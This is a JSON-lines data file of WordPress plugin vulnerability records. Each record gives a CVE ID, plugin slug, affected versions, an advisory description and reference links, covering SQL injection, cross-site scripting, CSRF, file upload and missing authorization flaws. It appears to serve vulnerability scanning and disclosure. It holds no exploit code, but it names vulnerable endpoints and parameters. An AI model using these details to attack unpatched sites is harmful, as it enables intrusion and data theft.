{"CVE_ID":"CVE-2024-3605","slug":"wp-hotel-booking","versionImpact":"1","versionEndExcluding":"1","description":"The WP Hotel Booking plugin for WordPress is vulnerable to SQL Injection via the 'room_type' parameter of the \/wphb\/v1\/rooms\/search-rooms REST API endpoint in all versions up to, and including, 2.1.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5931ad4e-7de3-41ac-b783-f7e58aaef569?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5931ad4e-7de3-41ac-b783-f7e58aaef569?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-hotel-booking\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-hotel-booking\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9707","slug":"hunk-companion","versionImpact":"1","versionEndExcluding":"1","description":"The Hunk Companion plugin for WordPress is vulnerable to unauthorized plugin installation\/activation due to a missing capability check on the \/wp-json\/hc\/v1\/themehunk-import REST API endpoint in all versions up to, and including, 1.8.4. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9c101fca-037c-4bed-9dc7-baa021a8b59c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9c101fca-037c-4bed-9dc7-baa021a8b59c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/WordPressBugBounty\\\/plugins-hunk-companion\\\/blob\\\/5a3cedc7b3d35d407b210e691c53c6cb400e4051\\\/hunk-companion\\\/import\\\/app\\\/app.php#L46\",\"name\":\"https:\\\/\\\/github.com\\\/WordPressBugBounty\\\/plugins-hunk-companion\\\/blob\\\/5a3cedc7b3d35d407b210e691c53c6cb400e4051\\\/hunk-companion\\\/import\\\/app\\\/app.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hunk-companion\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hunk-companion\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3166501%40hunk-companion&new=3166501%40hunk-companion&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3166501%40hunk-companion&new=3166501%40hunk-companion&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7664","slug":"alpack","versionImpact":"1","versionEndExcluding":"1","description":"The AL Pack plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the check_activate_permission() permission callback for the \/wp-json\/presslearn\/v1\/activate REST API endpoint in all versions up to, and including, 1.0.2. The callback reads the client-supplied Origin header and, after parsing, allows the request if it matches one of the trusted domains, without ever verifying user authentication, capabilities, or nonce tokens. This makes it possible for unauthenticated attackers to activate premium features by simply spoofing the Origin header.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/alpack\\\/trunk\\\/includes\\\/api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/alpack\\\/trunk\\\/includes\\\/api.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/alpack\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/alpack\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/793a2096-3332-412e-a45a-a7367b1209a3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/793a2096-3332-412e-a45a-a7367b1209a3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9020","slug":"list-category-posts","versionImpact":"0.90.2","versionEndExcluding":"0.90.3","description":"The List category posts WordPress plugin before 0.90.3 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 0.90.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6caa4e5d-8112-4d00-8e97-b41df611a071\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6caa4e5d-8112-4d00-8e97-b41df611a071\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4637","slug":"wpvivid-backuprestore","versionImpact":"0.9.94","versionEndExcluding":"0.9.95","description":"The WPvivid plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the restore() and get_restore_progress() function in versions up to, and including, 0.9.94. This makes it possible for unauthenticated attackers to invoke these functions and obtain full file paths if they have access to a back-up ID.","recommendation":"Update to version 0.9.95, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bad0bd6b-9c88-4d31-90b5-92d3ceb8c0af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bad0bd6b-9c88-4d31-90b5-92d3ceb8c0af?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/class-wpvivid.php#L3943\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/class-wpvivid.php#L3943\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/class-wpvivid.php#L3736\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/class-wpvivid.php#L3736\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3023214\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/class-wpvivid.php?contextall=1&old=3007861&old_path=%2Fwpvivid-backuprestore%2Ftrunk%2Fincludes%2Fclass-wpvivid.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3023214\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/class-wpvivid.php?contextall=1&old=3007861&old_path=%2Fwpvivid-backuprestore%2Ftrunk%2Fincludes%2Fclass-wpvivid.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12153","slug":"gdy-modular-content","versionImpact":"0.9.92","versionEndExcluding":"0.9.93","description":"The GDY Modular Content plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 0.9.91. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 0.9.93, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gdy-modular-content\\\/trunk\\\/includes\\\/elements.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gdy-modular-content\\\/trunk\\\/includes\\\/elements.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f854737-e87b-4c50-a9fb-d3b129f9d9fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f854737-e87b-4c50-a9fb-d3b129f9d9fc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5121","slug":"wpvivid-backuprestore","versionImpact":"0.9.89","versionEndExcluding":"0.9.90","description":"The Migration, Backup, Staging \u2013 WPvivid plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings (the backup path parameter) in versions up to, and including, 0.9.89 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 0.9.90, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdcac5f9-a744-4853-8a80-ed38fec81dbb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdcac5f9-a744-4853-8a80-ed38fec81dbb?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2956458%40wpvivid-backuprestore%2Ftrunk&old=2948265%40wpvivid-backuprestore%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2956458%40wpvivid-backuprestore%2Ftrunk&old=2948265%40wpvivid-backuprestore%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5120","slug":"wpvivid-backuprestore","versionImpact":"0.9.89","versionEndExcluding":"0.9.90","description":"The Migration, Backup, Staging \u2013 WPvivid plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the image file path parameter in versions up to, and including, 0.9.89 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with administrative privileges to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 0.9.90, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/320f4260-20c2-4f27-91ba-d2488b417f62?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/320f4260-20c2-4f27-91ba-d2488b417f62?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/tags\\\/0.9.89\\\/includes\\\/upload-cleaner\\\/class-wpvivid-uploads-cleaner.php#L161\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/tags\\\/0.9.89\\\/includes\\\/upload-cleaner\\\/class-wpvivid-uploads-cleaner.php#L161\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4274","slug":"wpvivid-backuprestore","versionImpact":"0.9.89","versionEndExcluding":"0.9.90","description":"The Migration, Backup, Staging \u2013 WPvivid plugin for WordPress is vulnerable to Directory Traversal in versions up to, and including, 0.9.89. This allows authenticated attackers with administrative privileges to delete the contents of arbitrary directories on the server, which can be a critical issue in a shared environments.","recommendation":"Update to version 0.9.90, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/tags\\\/0.9.89\\\/includes\\\/class-wpvivid-setting.php#L200\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/tags\\\/0.9.89\\\/includes\\\/class-wpvivid-setting.php#L200\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2956458%40wpvivid-backuprestore%2Ftrunk&old=2948265%40wpvivid-backuprestore%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2956458%40wpvivid-backuprestore%2Ftrunk&old=2948265%40wpvivid-backuprestore%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d94f38f-4b52-4b0d-800c-a6fca40bda3c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d94f38f-4b52-4b0d-800c-a6fca40bda3c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0143","slug":"send-pdf-for-contact-form-7","versionEndExcluding":"0.9.9.2","description":"The Send PDF for Contact Form 7 WordPress plugin before 0.9.9.2 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c4cd3d98-9678-49cb-9d1a-551ef8a810b9\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c4cd3d98-9678-49cb-9d1a-551ef8a810b9\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4209","slug":"poeditor","versionEndExcluding":"0.9.8","description":"The POEditor WordPress plugin before 0.9.8 does not have CSRF checks in various places, which could allow attackers to make logged in admins perform unwanted actions, such as reset the plugin's settings and update its API key via CSRF attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b2c6fa7d-1b0f-444b-8ca5-8c1c06cea1d9\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b2c6fa7d-1b0f-444b-8ca5-8c1c06cea1d9\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2007-10003","slug":"the-hackers-diet","versionImpact":"0.9.6b","versionEndExcluding":"0.9.7b","description":"A vulnerability, which was classified as critical, has been found in The Hackers Diet Plugin up to 0.9.6b on WordPress. This issue affects some unknown processing of the file ajax_blurb.php of the component HTTP POST Request Handler. The manipulation of the argument user leads to sql injection. The attack may be initiated remotely. Upgrading to version 0.9.7b is able to address this issue. The patch is named 7dd8acf7cd8442609840037121074425d363b694. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-243803.","recommendation":"Update to version 0.9.7b, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.243803\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.243803\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.243803\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.243803\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/the-hackers-diet\\\/releases\\\/tag\\\/0.9.7b\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/the-hackers-diet\\\/releases\\\/tag\\\/0.9.7b\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/the-hackers-diet\\\/commit\\\/7dd8acf7cd8442609840037121074425d363b694\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/the-hackers-diet\\\/commit\\\/7dd8acf7cd8442609840037121074425d363b694\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7620","slug":"customizer-export-import","versionImpact":"0.9.7","versionEndExcluding":"0.9.7.1","description":"The Customizer Export\/Import plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the '_import' function in all versions up to, and including, 0.9.7. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. NOTE: This vulnerability is only exploitable when used in conjunction with a race condition as the uploaded file is deleted shortly after it is created.","recommendation":"Update to version 0.9.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7600e7df-725d-4877-b0bf-5329f814723f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7600e7df-725d-4877-b0bf-5329f814723f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3144365\\\/customizer-export-import\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3144365\\\/customizer-export-import\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10108","slug":"inline-google-spreadsheet-viewer","versionImpact":"0.9.6","versionEndExcluding":"0.9.6.1","description":"A vulnerability was found in meitar Inline Google Spreadsheet Viewer Plugin up to 0.9.6 on WordPress and classified as problematic. Affected by this issue is the function displayShortcode of the file inline-gdocs-viewer.php. The manipulation leads to cross-site request forgery. The attack may be launched remotely. Upgrading to version 0.9.6.1 is able to address this issue. The name of the patch is 2a8057df8ca30adc859cecbe5cad21ac28c5b747. It is recommended to upgrade the affected component. VDB-230234 is the identifier assigned to this vulnerability.","recommendation":"Update to version 0.9.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/inline-google-spreadsheet-viewer\\\/releases\\\/tag\\\/0.9.6.1\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/inline-google-spreadsheet-viewer\\\/releases\\\/tag\\\/0.9.6.1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230234\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230234\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.230234\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.230234\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/inline-google-spreadsheet-viewer\\\/commit\\\/2a8057df8ca30adc859cecbe5cad21ac28c5b747\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/inline-google-spreadsheet-viewer\\\/commit\\\/2a8057df8ca30adc859cecbe5cad21ac28c5b747\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1347","slug":"customizer-export-import","versionEndExcluding":"0.9.6","description":"The Customizer Export\/Import WordPress plugin before 0.9.6 unserializes user input provided via the settings, which could allow high privilege users such as admin to perform PHP Object Injection when a suitable gadget is present","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/356a5977-c90c-4fc6-98ed-032d5b27f272\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/356a5977-c90c-4fc6-98ed-032d5b27f272\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-24870","slug":"wp-fastest-cache","versionEndExcluding":"0.9.5","description":"The WP Fastest Cache WordPress plugin before 0.9.5 is lacking a CSRF check in its wpfc_save_cdn_integration AJAX action, and does not sanitise and escape some the options available via the action, which could allow attackers to make logged in high privilege users call it and set a Cross-Site Scripting payload","recommendation":"Update to version 0.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/48de63ab-2ef1-4469-8fc4-9346068bdf06\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/48de63ab-2ef1-4469-8fc4-9346068bdf06\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/jetpack.com\\\/2021\\\/10\\\/14\\\/multiple-vulnerabilities-in-wp-fastest-cache-plugin\\\/\",\"name\":\"https:\\\/\\\/jetpack.com\\\/2021\\\/10\\\/14\\\/multiple-vulnerabilities-in-wp-fastest-cache-plugin\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-24869","slug":"wp-fastest-cache","versionEndExcluding":"0.9.5","description":"The WP Fastest Cache WordPress plugin before 0.9.5 does not escape user input in the set_urls_with_terms method before using it in a SQL statement, leading to an SQL injection exploitable by low privilege users such as subscriber","recommendation":"Update to version 0.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b2233795-1a32-45fc-9d51-b6bd0a073f5b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b2233795-1a32-45fc-9d51-b6bd0a073f5b\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/jetpack.com\\\/2021\\\/10\\\/14\\\/multiple-vulnerabilities-in-wp-fastest-cache-plugin\\\/\",\"name\":\"https:\\\/\\\/jetpack.com\\\/2021\\\/10\\\/14\\\/multiple-vulnerabilities-in-wp-fastest-cache-plugin\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4682","slug":"lightbox-gallery","versionEndExcluding":"0.9.5","description":"The Lightbox Gallery WordPress plugin before 0.9.5 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5fc92954-20cf-4563-806e-e7a8e5ccfc72\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5fc92954-20cf-4563-806e-e7a8e5ccfc72\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36842","slug":"wpvivid-backuprestore","versionImpact":"0.9.35","versionEndExcluding":"0.9.36","description":"The Migration, Backup, Staging \u2013 WPvivid plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the wpvivid_upload_import_files and wpvivid_upload_files AJAX actions that allows low-level authenticated attackers to upload zip files that can be subsequently extracted. This affects versions up to, and including 0.9.35.","recommendation":"Update to version 0.9.36, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de1da248-2e03-40fa-8997-7176dc06abc9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de1da248-2e03-40fa-8997-7176dc06abc9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2261665%40wpvivid-backuprestore%2Ftrunk&old=2252870%40wpvivid-backuprestore%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2261665%40wpvivid-backuprestore%2Ftrunk&old=2252870%40wpvivid-backuprestore%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.webarxsecurity.com\\\/vulnerability-in-wpvivid-backup-plugin-can-lead-to-database-leak\\\/?fbclid=IwAR3Ve74ZIvmx-aC0OssIWYwcWEjGq6yU16DcyVGHD1XUT3uYaZ3QyVu_Eos&utm_content=buffer4435b&utm_medium=social&utm_source=facebook.com&utm_campaign=buffer\",\"name\":\"https:\\\/\\\/www.webarxsecurity.com\\\/vulnerability-in-wpvivid-backup-plugin-can-lead-to-database-leak\\\/?fbclid=IwAR3Ve74ZIvmx-aC0OssIWYwcWEjGq6yU16DcyVGHD1XUT3uYaZ3QyVu_Eos&utm_content=buffer4435b&utm_medium=social&utm_source=facebook.com&utm_campaign=buffer\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36835","slug":"wpvivid-backuprestore","versionEndExcluding":"0.9.36","description":"The Migration, Backup, Staging \u2013 WPvivid plugin for WordPress is vulnerable to sensitive information disclosure of a WordPress site's database due to missing capability checks on the wp_ajax_wpvivid_add_remote AJAX action that allows low-level authenticated attackers to send back-ups to a remote location of their choice for review. This affects versions up to, and including 0.9.35.","recommendation":"Update to version 0.9.36, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/90c3f8bc-fc41-4ba7-b9f2-8873203d5794?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/90c3f8bc-fc41-4ba7-b9f2-8873203d5794?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.webarxsecurity.com\\\/vulnerability-in-wpvivid-backup-plugin-can-lead-to-database-leak\\\/?fbclid=IwAR3Ve74ZIvmx-aC0OssIWYwcWEjGq6yU16DcyVGHD1XUT3uYaZ3QyVu_Eos&utm_content=buffer4435b&utm_medium=social&utm_source=facebook.com&utm_campaign=buffer\",\"name\":\"https:\\\/\\\/www.webarxsecurity.com\\\/vulnerability-in-wpvivid-backup-plugin-can-lead-to-database-leak\\\/?fbclid=IwAR3Ve74ZIvmx-aC0OssIWYwcWEjGq6yU16DcyVGHD1XUT3uYaZ3QyVu_Eos&utm_content=buffer4435b&utm_medium=social&utm_source=facebook.com&utm_campaign=buffer\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2261665%40wpvivid-backuprestore%2Ftrunk&old=2252870%40wpvivid-backuprestore%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2261665%40wpvivid-backuprestore%2Ftrunk&old=2252870%40wpvivid-backuprestore%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1383","slug":"wpvivid-backup-mainwp","versionImpact":"0.9.32","versionEndExcluding":"0.9.33","description":"The WPvivid Backup for MainWP plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'id' parameter in all versions up to, and including, 0.9.32 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 0.9.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a8430ed-6aeb-46a3-8c42-59646845706e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a8430ed-6aeb-46a3-8c42-59646845706e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backup-mainwp\\\/trunk\\\/wpvivid-backup-mainwp.php#L525\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backup-mainwp\\\/trunk\\\/wpvivid-backup-mainwp.php#L525\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3040939%40wpvivid-backup-mainwp&new=3040939%40wpvivid-backup-mainwp&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3040939%40wpvivid-backup-mainwp&new=3040939%40wpvivid-backup-mainwp&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11873","slug":"glomex-oembed","versionImpact":"0.9.1","versionEndExcluding":"0.9.2","description":"The glomex oEmbed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'glomex_integration' shortcode in all versions up to, and including, 0.9.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 0.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/glomex-oembed\\\/tags\\\/0.9.1\\\/internals\\\/OembedGlomexIntegrationShortcode.php#L98\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/glomex-oembed\\\/tags\\\/0.9.1\\\/internals\\\/OembedGlomexIntegrationShortcode.php#L98\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e57cf85-eec0-4cf6-a800-ceb2b46e2bcd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e57cf85-eec0-4cf6-a800-ceb2b46e2bcd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
